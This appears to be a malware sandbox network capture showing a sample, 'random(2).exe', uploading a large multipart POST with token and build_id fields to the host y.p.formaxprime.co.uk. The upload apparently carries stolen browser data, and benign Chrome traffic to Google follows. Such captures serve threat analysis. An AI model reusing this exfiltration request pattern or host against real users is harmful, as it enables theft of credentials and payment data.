2025-03-19 13:02:17 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-19 13:02:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49702	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:02:19 UTC	274	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----7g4eukfkxlnyu3wl6pzu User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 186149 Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 67 34 65 75 6b 66 6b 78 6c 6e 79 75 33 77 6c 36 70 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 37 67 34 65 75 6b 66 6b 78 6c 6e 79 75 33 77 6c 36 70 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 37 67 34 65 75 6b 66 6b 78 6c 6e 79 75 33 77 6c 36 70 7a 75 0d 0a 43 6f 6e 74 Data Ascii: ------7g4eukfkxlnyu3wl6pzuContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------7g4eukfkxlnyu3wl6pzuContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------7g4eukfkxlnyu3wl6pzuCont
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 31 63 32 46 6e 5a 56 39 70 62 6e 4e 30 63 6e 56 6a 64 47 6c 76 62 6e 4e 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4b 59 46 30 47 41 63 58 52 55 55 42 67 6d 74 30 59 57 4a 73 5a 58 4e 6c 63 6e 5a 6c 63 6c 39 6a 59 58 4a 6b 58 32 4e 73 62 33 56 6b 58 33 52 76 61 32 56 75 58 32 52 68 64 47 46 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 48 45 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 49 43 68 70 5a 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 7a 64 57 5a 6d 61 58 67 67 56 6b 46 53 51 30 68 42 55 69 77 67 5a 58 Data Ascii: fdGV4dCBWQVJDSEFSLCB1c2FnZV9pbnN0cnVjdGlvbnNfdGV4dCBWQVJDSEFSKYF0GAcXRUUBgmt0YWJsZXNlcnZlcl9jYXJkX2Nsb3VkX3Rva2VuX2RhdGFzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhHENSRUFURSBUQUJMRSBzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhIChpZCBWQVJDSEFSLCBzdWZmaXggVkFSQ0hBUiwgZX
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49710	142.250.186.164	443	8048	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:02:26 UTC	613	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4B Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-19 13:02:26 UTC	1303	IN	HTTP/1.1 200 OK Date: Wed, 19 Mar 2025 13:02:26 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-JMMGqt76lTKzUCsZRQZRJw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-19 13:02:26 UTC	87	IN	Data Raw: 39 35 34 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 65 61 74 74 6c 65 20 73 65 61 68 61 77 6b 73 22 2c 22 61 69 72 20 66 6f 72 63 65 22 2c 22 61 6c 65 78 61 20 61 6d 61 7a 6f 6e 20 65 63 68 6f 22 2c 22 70 6f 6b 65 6d 6f 6e 20 6c 65 67 6f 20 73 65 74 73 20 32 30 Data Ascii: 954)]}'["",["seattle seahawks","air force","alexa amazon echo","pokemon lego sets 20
2025-03-19 13:02:26 UTC	1390	IN	Data Raw: 32 36 22 2c 22 64 65 6c 74 61 20 61 69 72 6c 69 6e 65 73 20 6c 61 67 75 61 72 64 69 61 20 61 69 72 70 6f 72 74 22 2c 22 6e 61 74 69 6f 6e 61 6c 20 68 75 72 72 69 63 61 6e 65 20 63 65 6e 74 65 72 22 2c 22 6e 65 77 20 76 6f 6c 63 61 6e 69 63 20 76 65 6e 74 20 69 6e 20 79 65 6c 6c 6f 77 73 74 6f 6e 65 22 2c 22 63 61 72 6e 69 76 61 6c 20 63 72 75 69 73 65 20 6c 69 6e 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 6f 49 6b 6b 34 53 46 51 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f Data Ascii: 26","delta airlines laguardia airport","national hurricane center","new volcanic vent in yellowstone","carnival cruise line"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNo
2025-03-19 13:02:26 UTC	918	IN	Data Raw: 30 70 73 65 55 74 53 4e 46 64 6f 55 30 74 71 55 6a 52 56 53 31 68 52 57 6d 35 78 56 33 56 57 5a 6e 52 4d 54 46 45 7a 63 54 4e 71 65 58 64 4a 65 47 35 78 51 54 51 72 4b 32 73 34 54 6c 4a 4e 63 46 70 61 65 58 4a 6b 56 30 51 78 65 47 46 49 4f 54 42 6e 4d 45 52 6a 61 30 39 42 61 31 6c 70 52 7a 4a 51 57 55 31 5a 63 55 6f 77 5a 30 4e 58 63 30 6c 70 64 32 68 57 63 57 78 5a 5a 46 56 4e 57 57 56 75 63 47 38 30 4e 56 56 44 51 57 39 48 65 48 46 61 64 6b 78 47 63 6d 70 32 4b 31 4a 34 53 45 64 4d 4c 30 35 4e 62 55 70 4c 54 33 70 6f 52 48 4a 53 4f 54 68 32 61 7a 4e 50 65 47 34 79 59 33 70 56 65 6c 4e 43 55 7a 42 47 63 43 39 57 52 57 30 79 56 6a 52 69 56 45 5a 46 56 6c 4d 79 57 46 70 68 4d 54 56 35 64 44 46 79 4e 33 51 31 51 6e 68 74 57 6c 56 31 5a 7a 4a 49 61 44 4d 32 Data Ascii: 0pseUtSNFdoU0tqUjRVS1hRWm5xV3VWZnRMTFEzcTNqeXdJeG5xQTQrK2s4TlJNcFpaeXJkV0QxeGFIOTBnMERja09Ba1lpRzJQWU1ZcUowZ0NXc0lpd2hWcWxZZFVNWWVucG80NVVDQW9HeHFadkxGcmp2K1J4SEdML05NbUpLT3poRHJSOTh2azNPeG4yY3pVelNCUzBGcC9WRW0yVjRiVEZFVlMyWFphMTV5dDFyN3Q1QnhtWlV1ZzJIaDM2
2025-03-19 13:02:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49711	142.250.186.164	443	8048	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:02:26 UTC	516	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-19 13:02:26 UTC	1055	IN	HTTP/1.1 200 OK Version: 736403927 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 19 Mar 2025 13:02:26 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-19 13:02:26 UTC	335	IN	Data Raw: 32 30 31 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 32 64 20 67 62 5f 50 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2014)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
